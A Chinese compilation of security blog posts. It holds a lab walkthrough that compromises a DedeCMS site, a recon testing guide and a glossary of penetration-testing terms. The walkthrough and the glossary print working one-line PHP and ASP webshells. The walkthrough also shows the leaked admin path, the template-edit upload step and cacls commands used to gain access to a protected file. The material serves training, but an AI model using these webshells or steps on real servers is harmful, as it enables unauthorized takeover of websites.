明

仅供学习，禁止用于违法行为。请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

题目地址

https://www.ichunqiu.com/experiment/detail?id=51123&source=1&otype=1

题目要求

要求获取目标网站的FLAG信息

开启环境后的页面

根据提示，我们访问http://file.ichunqiu.com/49ba59ab下载dedeCMS，下载下来是一个一键爆账号密码的软件

输入目标地址http://www.test.ichunqiu爆破

得到账号和密码MD5值

对加密MD5值进行解密

在线MD5解密：https://www.somd5.com/

得到密码：only_system

有账号密码。但是后台地址不知道，进行后台目录扫描

环境中tools里自带了很多的工具，这里找到目录扫描的工具

这里使用御剑后台扫描工具

对每个地址进行查看，发现，并没有我们想要的后台，尝试更换字典或扫描器进行扫描，发现还是没有后台地址

百度找织梦cms后台的方法

日志暴露后台地址

https://blog.csdn.net/forest_fire/article/details/50944689

发现可以从报错文件 /data/mysql_error_trace.inc 或 /data/mysqli_error_trace.inc 中，可得到泄露的后台路径，我们访问

http://www.test.ichunqiu/data/mysql_error_trace.inc 发现有个目录

进行访问，发现就是后台地址

输入账号密码进行登录，成功进入后台

下一步我们需要上传webshell，获取主机权限。

百度进行查找获取webshell方法

https://www.cnblogs.com/milantgh/p/3634550.html

在后台界面，我们看到在模板-->标签源码管理处可以进行增加一个新的标签，也可以对现有的便签进行编辑

这里，我们对现有的标签进行编辑写入一句话，保存

<?php @eval($_POST['lemonlove7']); ?>

上面也有提示，文件的存放位置

访问一下，使用环境中自带的菜刀进行连接

成功获取到shell

在c盘Documents and Settings(文件和设置) -->Administrator-->桌面看到了flag~ichunqiu.txt文件

进行查看，发现是空的，但文件大小不为0

在cmd命令中使用type进行查看看看 ，发现是拒绝访问，哎，肯定是权限不够

使用whoami查看我们现在的用户权限

whoami

发现我们的全是system即为最高权限，但是却还是看不falg~ichunqiu.txt，进行百度发现可能是对文件的权限进行了设置

windows下设置文件及其文件夹权限的方法：https://www.jb51.net/article/51907.htm

使用cacls命令对falg~ichunqiu.flag文件权限进行查看，发现对system用户的权限是n即为无权限

cacls flag~ichunqiu.txt

使用cacls命令对falg~ichunqiu.flag文件权限进行修改为F

cacls flag~ichunqiu.txt /E /P system:F /C

成功的拿到flag

type flag~ichunqiu.txt

结尾

和师傅们一起成长，努力学习网络安全知识。

文章来源：鹏组安全

如有侵权，请联系我们进行删除

文章目录

• 1. 利用搜索引擎发现和侦察信息泄露
• 2. web服务器指纹
• 3. 查看web 服务器元文件发现信息泄漏测试方法1：Robots.txt测试方法2：meta tag
• 4.枚举web 服务器上的应用程序
• 5. 审查网页评论和信息泄露的元数据
• 6. 确认程序入口
• 7. 通过应用程序映射执行路径
• 8. web 应用程序指纹和web 应用程序框架
• 原文链接

1. 利用搜索引擎发现和侦察信息泄露

测试对象：testphp.vulnweb.com

尝试在谷歌中搜索：“site: testphp.vulnweb.com”，得到基本的爬虫结果如下：

使用查询发现了更多有用的信息:

参考：

http://www.mrjoeyjohnson.com/Google.Hacking.Filters.pdf

2. web服务器指纹

Web 服务器指纹是渗透测试的关键任务。了解正在运行的 web 服务器的版本和类型能够让测试人员确定已知的漏洞以及在测试过程中使用适当的方法。

a）黑盒测试:

确认web 服务器身份的最简单最基本的方式是利用netcat查看 HTTP 响应报头中的服务器字段。

b）测试对象：

nc google.com 80

GET

/ HTTP/1.1

Host: google.com

enter

enter

c）自动测试工具：

httprint, Burpsuite

d）在线测试:

https://www.netcraft.com/

e）示例：

• netcat结果如下:

• 当然，我们也可以使用浏览器的一些拓展：

• 在线解决方案：

参考：

• http://www.terminally-incoherent.com/blog/2007/08/07/few-useful-netcat-tricks/
• https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
• http://netcat.sourceforge.net.
• https://www.darknet.org.uk/2007/09/httprint-v301-web-server-fingerprinting-tool-download/
• http://www.net-square.com/httprint.html

3. 查看web 服务器元文件发现信息泄漏

测试方法1：Robots.txt

网络蜘蛛/机器人/爬虫检索 (访问) 一个网页, 然后递归遍历超链接, 以检索进一步的 web 内容。他们的行为是由web根目录中robots.txt文件的Robots Exclusion Protocol指定的。

测试对象：abc.com/robots.txt

工具: 利用wget（例如: wget http://google.com/robots.txt）

参考：http://www.robotstxt.org/

示例：http://local/mutillidae/robots.txt

测试方法2：meta tag

Tag位于每个 HTML 文档的 HEAD 部分, 并且应该在一个 web 站点上的下述事件中保持一致：机器人/蜘蛛/爬虫的起始点不是从 webroot 以外的文档链接开始的。

网络蜘蛛/机器人/爬虫可以故意忽略 “<META NAME=”ROBOTS”>” tag。

工具: BurpSuite

4.枚举web 服务器上的应用程序

a) url:

• http://www.example.com/webmail·
• http://mail.example.com/

b) 端口:

最基本和最简单的方法是使用端口扫描仪 (如 nmap)。例如:

nmap 0-65535 192.168.1.1

c) 域名:

• 有许多方法可以用来确定DNS名称给给定的IP, 其中一个是nslookup。

cmd

nslookup

all

set type=all

example.com

• 基于Web的 DNS 搜索:

http://searchdns.netcraft.com/?host

• Reverse IP

-Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (require free

membership)

– MSN search: http://search.msn.com syntax: “ip:x.x.x.x” (without the quotes) o webhosting info: http://whois.webhosting.info/

-DNSstuff: http://www.dnsstuff.com/

d) 谷歌hack技术

示例：

• nmap:

• nslookup

e) 工具

• nslookup, dig
• Port scanner: nmap http://www.insecure.org
• Nessus Vulnerability Scanner. http://www.nessus.org
• Search engine: shodan.io, google.

5. 审查网页评论和信息泄露的元数据

对于程序员来说, 在源代码中添加详细注释和元数据是非常普遍的,甚至是推荐的。但是, HTML 代码中包含的注释和元数据可能会对潜在攻击者暴露内部信息。应对源代码中的注释和元数据进行审查以确定是否泄露了任何信息。

工具:

• Wget
• 任何浏览器

6. 确认程序入口

请求:

• 确认GETs和POST的位置
• 确认POST 请求中使用的所有参数(包括隐藏参数和非隐藏参数)
• 确认GETs请求中使用的所有参(通常在？之后)
• 确认查询字符串的所有参数
• 注意参数, 即使编码或加密, 并确定哪些帐户由哪些应用程序处理。

响应:

• 确认并记下任何header
• 确认哪里有重定向(300 HTTP 状态代码)，400 状态代码, 403 禁用和500内部服务器错误。

工具:

• 拦截代理: Burpsuite, paros, webscarab,…
• 浏览器插件: Tamper data on firefox,…

一些注意事项:

• 为了发现隐藏的参数, 可以使用Burpsuit的以下选项:

• 使用Burpsuite 和状态代码来查找它们

• 使用Burpsuit捕获请求参数和响应头

7. 通过应用程序映射执行路径

在开始安全测试之前, 了解应用程序的结构是至关重要的。如果不彻底了解应用程序的布局, 就不可能对其进行彻底的测试。

a）测试目的

• 映射目标应用程序并了解主要工作流

b）自动蜘蛛工具

• Burpsuit
• ZAP

c）自动化蜘蛛示例

8. web 应用程序指纹和web 应用程序框架

Web 框架指纹是信息采集过程中的一个重要子任务。了解框架的类型会有很大的优势，特别是当这种类型已经被渗透测试过。不仅是版本中已知的漏洞使得指纹处理如此重要, 框架以及已知文件结构中的特定错误同样如此。

a) 黑盒测试

为了定义当前框架, 有几个最常见的位置可供查找

• HTTP 标头
• cookie
• HTML 源代码
• 特定文件和文件夹

b) HTTP 标头

• 标识 web 应用程序框架的最基本形式是查看 HTTP 响应标头中的 X-Powered-By 字段。

c) Cookies

确定当前 web 框架的另一个类似的、更可靠的方法是特定框架的 cookie。

d) HTML 源代码

此技术基于在 HTML 页面源代码中查找某些模式。我们可以找到很多信息, 帮助测试人员识别特定的 web 应用程序。

e）特定文件和文件夹

每个应用程序在服务器上都有自己的特定文件和文件夹结构。我们可以使用工具或手动访问它们。

f）Dirbusting 示例

• 谷歌黑客技术

https://www.exploit-db.com/ghdb/4675/

• BurpSuite 入侵

g）常见应用程序标识符

h）Nikto

i）Whatweb

原文链接

https://packetstormsecurity.com/files/download/146830/web-application-security-testing.pdf

来也惭愧，菜鸟小白已经干了三年安全产品的测试，但是对于渗透测试都不曾好好了解，一直停留在基础功能测试和自动化测试的摸索上。正好我们组内在组织渗透测试的全套课程学习，将会从最基础的内容开始学起，学习的内容菜鸟小白也会整理出来，一起分享。

今天我们一起来看看一些基础概念吧。

基础概念

1、脚本（asp、php、jsp）

ASP：ASP即Active Server Pages，是Microsoft公司开发的服务器端脚本环境，可用来创建动态交互式网页并建立强大的web应用程序。当服务器收到对ASP文件的请求时，它会处理包含在用于构建发送给浏览器的HTML（Hyper Text Markup Language，超文本标记语言）网页文件中的服务器端脚本代码。除服务器端脚本代码外，ASP文件也可以包含文本、HTML（包括相关的客户端脚本）和com组件调用。

PHP：PHP即“超文本预处理器”，是一种通用开源脚本语言。PHP是在服务器端执行的脚本语言，与C语言类似，是常用的网站编程语言。

JSP：JSP（全称JavaServer Pages）是由Sun Microsystems公司主导创建的一种动态网页技术标准。JSP部署于网络服务器上，可以响应客户端发送的请求，并根据请求内容动态地生成HTML、XML或其他格式文档的Web网页，然后返回给请求者。

2、html（css、js、html）

html：HTML称为超文本标记语言，是一种标识性的语言。它包括一系列标签．通过这些标签可以将网络上的文档格式统一，使分散的Internet资源连接为一个逻辑整体。HTML文本是由HTML命令组成的描述性文本，HTML命令可以说明文字，图形、动画、声音、表格、链接等。

3、HTTP协议

HTTP：http是一个简单的请求-响应协议，它通常运行在TCP之上。它指定了客户端可能发送给服务器什么样的消息以及得到什么样的响应。请求和响应消息的头以ASCII码形式给出；而消息内容则具有一个类似MIME的格式。

4、CMS（B/S）

CMS：内容管理系统（content management system，CMS），我们这边一般使用的B/S架构，也就是浏览器访问的方式。另外还有一种C/S架构，就是通过应用程序的访问方式。

5、MD5

MD5：MD5信息摘要算法（英语：MD5 Message-Digest Algorithm），一种被广泛使用的密码散列函数，可以产生出一个128位（16字节）的散列值（hash value），用于确保信息传输完整一致。渗透测试中一般密码的解码需要使用。

6、其它概念

肉鸡：被黑客入侵并被长期驻扎的计算机或服务器

抓鸡：利用使用量大的程序的漏洞，使用自动化方式获取肉鸡的行为

webshell：通过web入侵的一种脚本工具，可以据此对网站服务进行一定程度的控制

漏洞：硬件、软件、协议等可利用的安全缺陷，可能被攻击者利用，对数据进行篡改、控制等。

一句话木马：通过向服务器提交一句简短的代码，配合本地客户端实现webshell功能的木马。

举例：

<%eval request("pass")%>

<%execute(request("pass"))%>

其中request("pass")接收客户端提交的数据，pass为执行命令的参数值。

eval/execute，函数执行客户端命令的内容

又如：PHP的一句话木马

<?php eval($_POST[123]);?>

下面的代码可以用POST的方式提交PHP语句，利用php脚本的各种函数，就可以实现执行系统命令、修改数据库、增删改查等各种功能。

<form method=post action=http://木马地址>

<textarea name=123>

//这里写PHP代码

phpinfo();

</textarea>

<input type=submit>

</form>

提权：操作系统低权限的账户将自己提升为管理员权限使用的方法。

后门：黑客为了对主机进行长期的控制没在机器上种植的一段程序或留下的一个“入口”

跳板：使用肉鸡IP来实施攻击其他目标，以便更好的隐藏自己的身份信息

旁站：同一个物理服务器下搭建的多个网站。如：服务器下有三个网站A、B、C，B和C就是A的旁站。

旁站入侵：即同服务器下的网址入侵，入侵之后可以通过提权跨目录等手段拿到目标网址的权限。常见的旁站查询工具有：WebRobot、御剑、明小子和web在线查询等。

C段入侵：即同C段下服务器入侵。如目标IP为192.168.1.253入侵192.168.1.*的任意一台机器，然后利用一些黑客工具嗅探获取在网上传输的各种信息。常用的工具有：Cain（Windows）、Sniffit（UNIX）、Snoop、tcpdump、dsniff等

渗透测试

黑盒测试：在未授权的情况，模拟黑客的攻击方法和思维方式，来评估计算机网络系统可能存在的安全风险。黑盒测试考验的是综合能力（OS、database、script、code、思路和社工）。

白盒测试：从内部发起，偏向于代码审计

APT攻击：Advanced Persistent Threat，高级可持续性攻击，是指组织（特别是政府）或者小团体利用先进的攻击手段对特定目标进行长期持续性网络攻击的攻击形式，具有以下特点：

1.极强的隐蔽性

2.潜伏期长，持续性强

3.目标性强

渗透测试的特点

充满挑战与刺激；

思路和经验积累往往决定成败；

渗透测试的流程

渗透测试：更全面的找出服务器的问题，更倾向于保护

明确目标——信息收集——漏洞探测——漏洞验证——信息分析——获取所需——信息整理——形成报告

明确目标：范围、规则、需求

信息收集：基础、系统、应用、版本（版本漏洞）、服务、人员（密码破解）、防护

漏洞探测：系统漏洞、webserver漏洞、web应用漏洞、其它端口服务漏洞、通信安全

漏洞验证：自动化验证、手工验证、试验验证、登录猜测、业务漏洞验证、公开资源的利用

信息分析：精准打击、绕过防御机制、定制攻击路径、绕过检测机制、绕过代码

获取所需：实施攻击、获取内部信息、进一步渗透、持续性存在*、清理痕迹

信息整理：整理渗透工具、整理收集信息、整理

形成报告：按需整理、补充介绍、修补建议

如果可以的话，请帮忙点击下方广告，给菜鸟小白众筹一点电费，谢谢~